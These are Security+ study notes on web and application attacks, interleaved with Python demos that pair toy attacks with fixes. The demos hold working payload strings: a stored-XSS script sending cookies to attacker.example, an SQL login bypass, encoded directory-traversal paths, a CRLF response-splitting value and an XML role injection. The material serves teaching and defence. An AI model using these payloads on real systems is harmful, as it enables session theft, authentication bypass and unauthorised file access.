Chapter 3


Types of overflow attacks:

- Buffer overflow attacks
- Integer overflow attacks
- Arbitrary/remote code execution attacks

Cookies

- Cookies store user-specific information on the user's local computer

Common web application attacks are:

- Cross-site scripting
- SQL injection
- XML injection
- Command injection/directory traversal

Header manipulation

- The HTTP header contains fields that characterize the data being transmitted
- Headers originate from the Web browser
  • Browsers do not normally let the user alter them
  • An attacker's short program (or an intercepting proxy) can modify them before they are sent

Buffer overflow attacks

- Occur when a process attempts to store data in RAM beyond the boundaries of a fixed-length storage buffer
- The extra data overflows into adjacent memory locations
  • An attacker can overflow the buffer so that an adjacent pointer (typically the saved return address) is replaced with a new address pointing to the attacker's malware code

Locally shared object (LSO)

- Can store up to 100 KB of data from a website
  • More complex than the simple text found in a regular cookie
  • Also called a Flash cookie

First-party cookie

- Cookie created by the Web site the user is currently viewing

Session cookie

- stored in RAM and expires when browser is closed

Arbitrary/Remote Code Execution

- A heap spray is often used in an arbitrary/remote code execution attack
  • Fills large regions of heap memory with copies of the attacker's code (usually preceded by NOP sleds) so that a corrupted pointer is likely to land in it

• Malicious add-ons can be written using Microsoft's ActiveX

- ActiveX is a set of rules for how applications under the Microsoft Windows OS should share information
- Attackers can take advantage of vulnerabilities in ActiveX to perform malicious attacks on a computer

In an integer overflow attack:

An attacker changes the value of a variable to something outside the range that the programmer had intended by using an integer overflow

• Integer Overflow Attack

An integer overflow is the condition that occurs when the result of an arithmetic operation exceeds the maximum size of the integer type used to store it
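The two overflow conditions above chain together in practice: a multiplication that wraps lets an oversized request slip past a length check, and the copy that follows then runs off the end of the fixed-length buffer into the adjacent memory. The following Python is an added example, not code from the study set or the textbook it summarizes. Python integers never wrap, so 32-bit unsigned arithmetic is simulated with a mask; process memory is a toy `bytearray` with a 16-byte buffer immediately followed by a 4-byte saved return address; the two addresses are made up for illustration.

```python
# Added example: integer overflow defeating a length check, then the resulting
# buffer overflow overwriting a saved return address. Not from the study set.
# Python integers never wrap, so 32-bit unsigned arithmetic is simulated with a
# mask, and process memory is a toy bytearray: a 16-byte fixed-length buffer
# immediately followed by a 4-byte saved return address (constructed layout).

U32_MASK = 0xFFFFFFFF
BUF_LEN = 16                 # fixed-length buffer
RET_OFF = BUF_LEN            # saved return address sits right after it
FRAME_LEN = BUF_LEN + 4
LEGIT_RET = 0x08048400       # constructed "legitimate" return address
ATTACKER_RET = 0xDEADBEEF    # constructed address of attacker-controlled code


def u32_mul(a, b):
    """32-bit unsigned multiply: returns (wrapped product, overflowed?)."""
    exact = a * b
    return exact & U32_MASK, exact > U32_MASK


def vulnerable_size_check(count, elem_size, limit=FRAME_LEN):
    """Length check as often written in C: total = count * elem_size in uint32,
    then compared against the buffer size. A wrapped total slips past."""
    total, _ = u32_mul(count, elem_size)
    if total > limit:
        raise ValueError("rejected: %d bytes exceeds %d" % (total, limit))
    return total


def safe_size_check(count, elem_size, limit=FRAME_LEN):
    """Hardened: bound count before multiplying, so the product cannot wrap."""
    if elem_size <= 0 or count < 0 or count > limit // elem_size:
        raise ValueError("rejected: %d * %d would exceed %d" % (count, elem_size, limit))
    return count * elem_size


def rejects(check, count, elem_size):
    """True if the given size check refuses this (count, elem_size) pair."""
    try:
        check(count, elem_size)
    except ValueError:
        return True
    return False


def new_frame():
    """Toy stack frame: zeroed buffer plus the legitimate saved return address."""
    memory = bytearray(FRAME_LEN)
    memory[RET_OFF:RET_OFF + 4] = LEGIT_RET.to_bytes(4, "little")
    return memory


def saved_return(memory):
    return int.from_bytes(memory[RET_OFF:RET_OFF + 4], "little")


def unchecked_copy(memory, data):
    """strcpy-style copy into the buffer with no bounds check: bytes beyond
    BUF_LEN land in the adjacent saved return address."""
    for i, byte in enumerate(data):
        memory[i] = byte
    return memory


def demo_overflow():
    """Run the attack against the toy frame; returns (before, after) return addresses."""
    frame = new_frame()
    before = saved_return(frame)
    # Attacker-chosen count: 0x40000001 * 4 wraps to 4, so the vulnerable check passes
    vulnerable_size_check(0x40000001, 4)
    payload = b"A" * BUF_LEN + ATTACKER_RET.to_bytes(4, "little")
    unchecked_copy(frame, payload)
    return before, saved_return(frame)


if __name__ == "__main__":
    print("wrapped product:", u32_mul(0x40000001, 4))
    print("return address before/after: %#x -> %#x" % demo_overflow())
    print("hardened check rejects:", rejects(safe_size_check, 0x40000001, 4))
```

The hardened check divides instead of multiplying: comparing `count` against `limit // elem_size` can never wrap, which is the same rule the C standard library's `calloc` is expected to apply internally.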

Attachments

- Files that are coupled with email messages
- Malicious attachments are commonly used to spread viruses, Trojans, and other malware

Session Hijacking

- The attacker attempts to impersonate the user by stealing or guessing the session token
  • A session token is a random string assigned to an interaction between a user and a web application
- An attacker can attempt to obtain the session token by:
  • Using XSS or another attack to steal the session token cookie from the victim's computer
  • Eavesdropping on the transmission
  • Guessing the session token
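Each of the three theft routes above has a matching control: a token drawn from a CSPRNG cannot be guessed, the `Secure` flag keeps it off plaintext connections where it could be sniffed, and `HttpOnly` keeps script (including an XSS payload) from reading it. The Python below is an added example, not from the study set: it contrasts a guessable token with a proper one, builds the `Set-Cookie` line with those attributes, and keeps the session table server-side. The timestamp and user IDs are constructed.

```python
# Added example (not from the study set): a predictable session token beside a
# properly generated one, the Set-Cookie attributes that block the three theft
# routes above, and a server-side store that compares tokens in constant time.
import secrets


def weak_token(user_id, issued_at):
    """Predictable token: user id and login timestamp in hex. Anyone who knows
    roughly when the victim logged in can enumerate a small candidate list."""
    return "%08x%08x" % (user_id, issued_at)


def guess_weak_tokens(user_id, approx_time, window=60):
    """Attacker's candidate list for a weak token issued within +/- window seconds."""
    return [weak_token(user_id, t) for t in range(approx_time - window, approx_time + window + 1)]


def strong_token(nbytes=32):
    """256 random bits from the OS CSPRNG, URL-safe; guessing is infeasible."""
    return secrets.token_urlsafe(nbytes)


def set_cookie_header(name, value, max_age=None):
    """Build a Set-Cookie line for the session token.
    HttpOnly: script (e.g. an XSS payload reading document.cookie) cannot read it.
    Secure:   never sent over plaintext HTTP, so it cannot be sniffed.
    SameSite: not attached to cross-site requests.
    Without Max-Age it is a session cookie that expires when the browser closes."""
    parts = ["%s=%s" % (name, value), "Path=/", "HttpOnly", "Secure", "SameSite=Lax"]
    if max_age is not None:
        parts.append("Max-Age=%d" % max_age)  # makes it a persistent cookie
    return "Set-Cookie: " + "; ".join(parts)


class SessionStore:
    """Server-side session table keyed by token; the client only ever holds the token."""

    def __init__(self):
        self._sessions = {}

    def create(self, user_id):
        token = strong_token()
        self._sessions[token] = user_id
        return token

    def lookup(self, presented):
        """Per-token comparison in constant time so timing does not leak token bytes."""
        for token, user_id in self._sessions.items():
            if secrets.compare_digest(token, presented):
                return user_id
        return None

    def revoke(self, token):
        """Logout: a stolen token is useless once the server forgets it."""
        return self._sessions.pop(token, None) is not None
```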

• Security risks exist when using add-ons

Attackers can create malicious add-ons to launch attacks against the user's computer

• Overflow attacks

Attacks designed to "overflow" areas of memory with instructions from the attacker

Application Attacks

Attacks on the applications in a networked computer system can be directed toward the server, the client, or both

Drive-by download

- The client computer is compromised simply by viewing a Web page
- Attackers inject content into a vulnerable Web server
  • Gain access to the server's operating system
- Attackers craft a zero-pixel iframe (short for inline frame) to avoid visual detection
  • Embeds an HTML document inside the main document
- The client's browser downloads the malicious script
  • Instructs the computer to download malware
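The zero-pixel iframe is also what a defender looks for when checking whether a site has been injected. The scanner below is an added example, not from the study set: it parses page HTML with the standard library and reports iframes that would be invisible to the user, either sized 0x0 or hidden by inline CSS. The sample page and hostnames are constructed.

```python
# Added example (not from the study set): scanning page HTML for the zero-pixel
# or hidden iframe used in a drive-by download. Sample page and hosts are constructed.
from html.parser import HTMLParser

SAMPLE_PAGE = """
<html><body>
<h1>Welcome</h1>
<iframe src="https://video.example.net/embed/123" width="640" height="360"></iframe>
<iframe src="http://cdn-static.example.org/ld.php" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://other.example.org/x.html" style="display:none; visibility:hidden"></iframe>
</body></html>
"""


def _is_zero(value):
    """True for dimension attributes such as '0', '0px', ' 0 '."""
    if value is None:
        return False
    digits = value.strip().lower().rstrip("px").strip()
    return digits.isdigit() and int(digits) == 0


def _is_hidden_style(style):
    """Inline CSS that hides the frame without a zero width/height attribute."""
    if not style:
        return False
    s = style.replace(" ", "").lower()
    return any(rule in s for rule in ("display:none", "visibility:hidden", "width:0", "height:0"))


class HiddenIframeScanner(HTMLParser):
    """Collects the src of every iframe the user would never see."""

    def __init__(self):
        super().__init__()
        self.suspicious = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # HTMLParser lowercases attribute names for us
        if _is_zero(a.get("width")) or _is_zero(a.get("height")) or _is_hidden_style(a.get("style")):
            self.suspicious.append(a.get("src", ""))


def find_hidden_iframes(html_text):
    scanner = HiddenIframeScanner()
    scanner.feed(html_text)
    return scanner.suspicious


if __name__ == "__main__":
    for src in find_hidden_iframes(SAMPLE_PAGE):
        print("hidden iframe ->", src)
```

Run it over a saved copy of a page (or the HTML a crawler fetched) and treat any hit pointing at a host you do not recognize as a lead, not proof; legitimate tracking pixels use the same trick, so the source host is what decides.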

Add-ons can do the following:

- Create additional web browser toolbars
- Change browser menus
- Be aware of other tabs open in the same browser
- Process the content of every webpage that is loaded

Cross-Site Scripting (XSS)

Injecting scripts into a Web application server to direct attacks at unsuspecting clients
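The server-side mistake behind XSS is writing user-supplied text into the page as markup. The Python below is an added example, not from the study set: it renders a constructed comment both raw and HTML-encoded, and checks whether a live `<script>` element survives. The attacker hostname in the payload is made up.

```python
# Added example (not from the study set): a comment page rendered with and
# without output encoding. The comment text and attacker host are constructed.
import html
import re

# Stored-XSS style payload: rendered raw, every visitor's browser would send its
# cookies for this site to the attacker's host.
MALICIOUS_COMMENT = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"

PAGE = "<html><body><h2>Comments</h2><p>{comment}</p></body></html>"


def render_vulnerable(comment):
    """Interpolates user data into the HTML unchanged; the browser treats it as markup."""
    return PAGE.format(comment=comment)


def render_escaped(comment):
    """Encodes <, >, &, and quotes so the comment is displayed as text, not executed."""
    return PAGE.format(comment=html.escape(comment, quote=True))


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_script_tag(rendered):
    """Crude check used here only to show whether a live <script> survived rendering."""
    return SCRIPT_TAG.search(rendered) is not None


if __name__ == "__main__":
    print("raw render executable:", contains_script_tag(render_vulnerable(MALICIOUS_COMMENT)))
    print("escaped render executable:", contains_script_tag(render_escaped(MALICIOUS_COMMENT)))
```

`html.escape` is the right encoder for text inside an element body or a quoted attribute; data placed inside a `<script>` block or a URL needs the encoding for that context instead, which is why templating engines that auto-escape per context are preferred over hand-built strings.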

• Malicious Add-ons

- Plug-in: a third-party library that attaches to a web browser and can be embedded inside a webpage
- Add-ons or extensions: add functionality to the web browser

• Examples of HTTP header manipulation

- Referer
- Accept-Language
- Response splitting

Server-Side Web Application Attacks

Securing server-side web applications is often considered more difficult than protecting other systems

SQL Injection

- Targets SQL servers by injecting malicious commands into them
- SQL (Structured Query Language) is used to manipulate data stored in a relational database
- Forgotten-password example:
  • The attacker enters an incorrectly formatted e-mail address
  • The response (for example, a database error message) tells the attacker whether input is being validated
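Both halves of the card above, the probe and the injection itself, can be run against a real database engine. The Python below is an added example, not from the study set: it builds the login query by string concatenation next to the parameterized form and runs both against an in-memory SQLite table with constructed rows. The same pattern applies to any header value, such as `Accept-Language`, that an application passes into a query.

```python
# Added example (not from the study set): the login query built by string
# concatenation beside the parameterized form, run against in-memory SQLite
# with constructed rows.
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (email TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice@example.com", "correct horse", "admin"),
        ("bob@example.com", "hunter2", "user"),
    ])
    return con


def login_vulnerable(con, email, password):
    """User input spliced directly into the SQL text."""
    sql = "SELECT email, role FROM users WHERE email = '%s' AND password = '%s'" % (email, password)
    return con.execute(sql).fetchall()


def login_parameterized(con, email, password):
    """Placeholders: the driver sends the input as data, never as SQL syntax."""
    sql = "SELECT email, role FROM users WHERE email = ? AND password = ?"
    return con.execute(sql, (email, password)).fetchall()


def probe_validation(con, email):
    """The forgotten-password probe from the card: a malformed address that is a
    SQL syntax error shows whether input is validated or passed straight through."""
    try:
        con.execute("SELECT email FROM users WHERE email = '%s'" % email)
    except sqlite3.OperationalError:
        return "input reached the database unvalidated"
    return "query ran cleanly"


if __name__ == "__main__":
    db = make_db()
    print(probe_validation(db, "alice' OR"))
    # Comment out the password check entirely: email = alice@example.com'--
    print(login_vulnerable(db, "alice@example.com'--", "wrong"))
    print(login_parameterized(db, "alice@example.com'--", "wrong"))
```

The `'--` payload works because SQLite (like most engines) treats `--` as a comment to end of line, so the `AND password = ...` clause never executes; with placeholders the same string is just an e-mail address that matches nobody.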

Client-Side Application Attacks

- Web application attacks are server-side attacks
- Client-side attacks target vulnerabilities in client applications that interact with a compromised server or process malicious data
- The client initiates the connection with the server, which could result in an attack

Directory Traversal / Command Injection

- Web server users are typically restricted to the root directory
- Users may be able to access subdirectories, but not parallel or higher-level directories
- Directory traversal attack
  • Uses malformed input or takes advantage of software vulnerabilities
  • The attacker moves from the root directory to restricted directories
- Command injection attack
  • The attacker enters commands to execute on the server
- A directory traversal attack can be launched through:
  • A vulnerability in the web application program that accepts user input
  • A vulnerability in the web server OS software
  • A security misconfiguration on the server
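The first launch point listed, an application that accepts a file name from the user, is the one a developer can fix directly. The Python below is an added example, not from the study set: it creates a throwaway web root with one public file and a restricted file beside it, serves a requested path with no check, and then with the check that canonicalizes the path and requires it to remain under the root. Requested paths, including the URL-encoded `%2e%2e` form, are constructed samples.

```python
# Added example (not from the study set): resolving a user-supplied file name
# against the web root and refusing anything that escapes it. The web root is a
# temporary directory created here; requested paths are constructed samples.
import os
import tempfile
from urllib.parse import unquote


def make_site():
    """outer/www is the web root; outer/secret.txt is outside it."""
    outer = tempfile.mkdtemp(prefix="site-")
    root = os.path.join(outer, "www")
    os.makedirs(os.path.join(root, "docs"))
    with open(os.path.join(root, "docs", "readme.txt"), "w") as f:
        f.write("public file\n")
    with open(os.path.join(outer, "secret.txt"), "w") as f:
        f.write("restricted\n")
    return root


def serve_vulnerable(root, requested):
    """Decodes the request and joins it onto the root with no containment check."""
    path = os.path.join(root, unquote(requested).lstrip("/"))
    with open(path) as f:
        return f.read()


def resolve_safe(root, requested):
    """Decode once, canonicalize (collapses '..' and symlinks), then require the
    real path to stay under the real root."""
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, unquote(requested).lstrip("/")))
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise PermissionError("path escapes web root: %r" % requested)
    return candidate


def serve_safe(root, requested):
    with open(resolve_safe(root, requested)) as f:
        return f.read()


def is_blocked(root, requested):
    """True if the hardened resolver refuses the request."""
    try:
        resolve_safe(root, requested)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    site = make_site()
    print(serve_vulnerable(site, "docs/%2e%2e/%2e%2e/secret.txt").strip())
    print("blocked:", is_blocked(site, "docs/%2e%2e/%2e%2e/secret.txt"))
```

Decoding exactly once, before canonicalizing, matters: decoding a second time would turn a double-encoded `%252e%252e` into `..` after the check had already run. Stripping `..` with string replacement is the wrong fix; `....//` survives one pass of that and still traverses.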

Zero-day attack

An attack that exploits previously unknown vulnerabilities; victims have no time to prepare for or defend against the attack

An arbitrary/remote code execution attack allows

an attacker to run programs and execute commands on a different computer - Gains control of the victim's computer to execute commands

• Traditional network security devices

- Can block traditional network attacks, but cannot always block web application attacks
- Many network security devices ignore the content of HTTP traffic

Accept-Language

- Field contents may be passed directly to an SQL database
- An attacker could inject an SQL command by modifying this header

Referer field

- Indicates the site that generated the Web page (the header name is spelled "Referer" in HTTP)
- An attacker can modify this field to hide the fact that the request came from another site

Response splitting

- One of the most common HTTP header manipulation attacks
- The attacker places carriage-return/line-feed characters in a value that the server copies into a response header, ending that response early and starting a second, attacker-written one
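A redirect that copies a query parameter into the `Location` header is the textbook site of this attack. The Python below is an added example, not from the study set: the vulnerable builder copies the value as-is, the hardened one refuses any value containing CR, LF or NUL, and a small counter shows how many responses a downstream proxy or browser would parse from each result. The URLs and the injected second response are constructed.

```python
# Added example (not from the study set): HTTP response splitting through a
# redirect whose Location header is built from a query parameter, next to a
# builder that refuses control characters. All URLs are constructed.
CRLF = "\r\n"

# Attacker-controlled "next" parameter: terminates the 302 early and appends a
# complete second response carrying attacker HTML (25-byte body).
ATTACK_TARGET = (
    "https://www.example.com/"
    + CRLF + "Content-Length: 0" + CRLF + CRLF
    + "HTTP/1.1 200 OK" + CRLF
    + "Content-Type: text/html" + CRLF
    + "Content-Length: 25" + CRLF + CRLF
    + "<script>alert(1)</script>"
)


def build_redirect_vulnerable(target):
    """Copies the parameter into the header line unchanged."""
    lines = ["HTTP/1.1 302 Found", "Location: " + target, "Content-Length: 0"]
    return CRLF.join(lines) + CRLF + CRLF


def build_redirect_safe(target):
    """Rejects CR, LF and NUL: no user-controlled byte may end a header line."""
    if any(ch in target for ch in "\r\n\x00"):
        raise ValueError("header value contains line-break or control characters")
    lines = ["HTTP/1.1 302 Found", "Location: " + target, "Content-Length: 0"]
    return CRLF.join(lines) + CRLF + CRLF


def is_rejected(target):
    """True if the hardened builder refuses the value."""
    try:
        build_redirect_safe(target)
    except ValueError:
        return True
    return False


def response_count(raw):
    """How many HTTP responses a downstream proxy or browser would parse from raw."""
    return sum(1 for line in raw.split(CRLF) if line.startswith("HTTP/1."))


if __name__ == "__main__":
    print("responses in vulnerable output:", response_count(build_redirect_vulnerable(ATTACK_TARGET)))
    print("hardened builder rejects:", is_rejected(ATTACK_TARGET))
```

Modern web frameworks and HTTP libraries already raise on CR/LF in header values; the check is still worth keeping at the application boundary, since the split response can poison a shared cache and affect users who never visited the malicious link.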

Persistent cookie

- Recorded on the computer's hard drive and does not expire when the browser closes
- Also called a tracking cookie

Third-party cookie

- Cookie placed by a site's advertisers to record user preferences

Many server-side web application attacks

target the input that the applications accept from users

What do cookies do?

- Cookies pose security and privacy risks
  • First-party cookies may be stolen and used to impersonate the user
  • Used to tailor advertising
  • Can be exploited by attackers

XML Injection

- Markup language: a method for adding annotations to text
- HTML
  • Uses tags surrounded by brackets
  • Instructs the browser to display text in a specific format
- XML
  • Carries data instead of indicating how to display it
  • No predefined set of tags; users define their own tags
- XML injection attack
  • Similar to a SQL injection attack
  • The attacker discovers a Web site that does not filter user data
  • Injects XML tags and data into the database
- XPath injection
  • A specific type of XML injection attack
  • Attempts to exploit XML Path Language queries that are built from user input

Source: CompTIA Security+ Guide to Network Security Fundamentals, Fifth Edition © Cengage Learning 2015
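The "injects XML tags and data" step is concrete when the application assembles a record by string formatting. The Python below is an added example, not from the study set: a registration record is built from a user-supplied name both raw and through `xml.sax.saxutils.escape`, then parsed back to show which roles the application would read. The document layout and the attacker's name are constructed. The same escaping rule (or, better, a parameterized query API) is what keeps quotes in user input from altering an XPath expression.

```python
# Added example (not from the study set): a user-registration record built by
# string formatting versus with XML escaping. Layout and input are constructed.
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

TEMPLATE = "<user><name>{name}</name><role>user</role></user>"

# Closes <name>, injects an attacker-chosen <role>, then reopens a dummy <name>
# so the resulting document still parses and stores cleanly.
INJECTED_NAME = "mallory</name><role>admin</role><name>mallory"


def build_vulnerable(name):
    """User text dropped into the markup unchanged."""
    return TEMPLATE.format(name=name)


def build_escaped(name):
    """&, < and > encoded, so the text can only ever be character data."""
    return TEMPLATE.format(name=escape(name))


def roles_in(xml_text):
    """Every role the application would read back from the stored record."""
    root = ET.fromstring(xml_text)
    return [r.text for r in root.findall("role")]


def names_in(xml_text):
    return [n.text for n in ET.fromstring(xml_text).findall("name")]


if __name__ == "__main__":
    print("roles, unescaped:", roles_in(build_vulnerable(INJECTED_NAME)))
    print("roles, escaped:  ", roles_in(build_escaped(INJECTED_NAME)))
```

Which role wins in the vulnerable case depends on whether the reader takes the first or the last `<role>`; either way the attacker controls one, which is why the fix is to make the structure impossible to alter rather than to pick a "safe" reading order.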

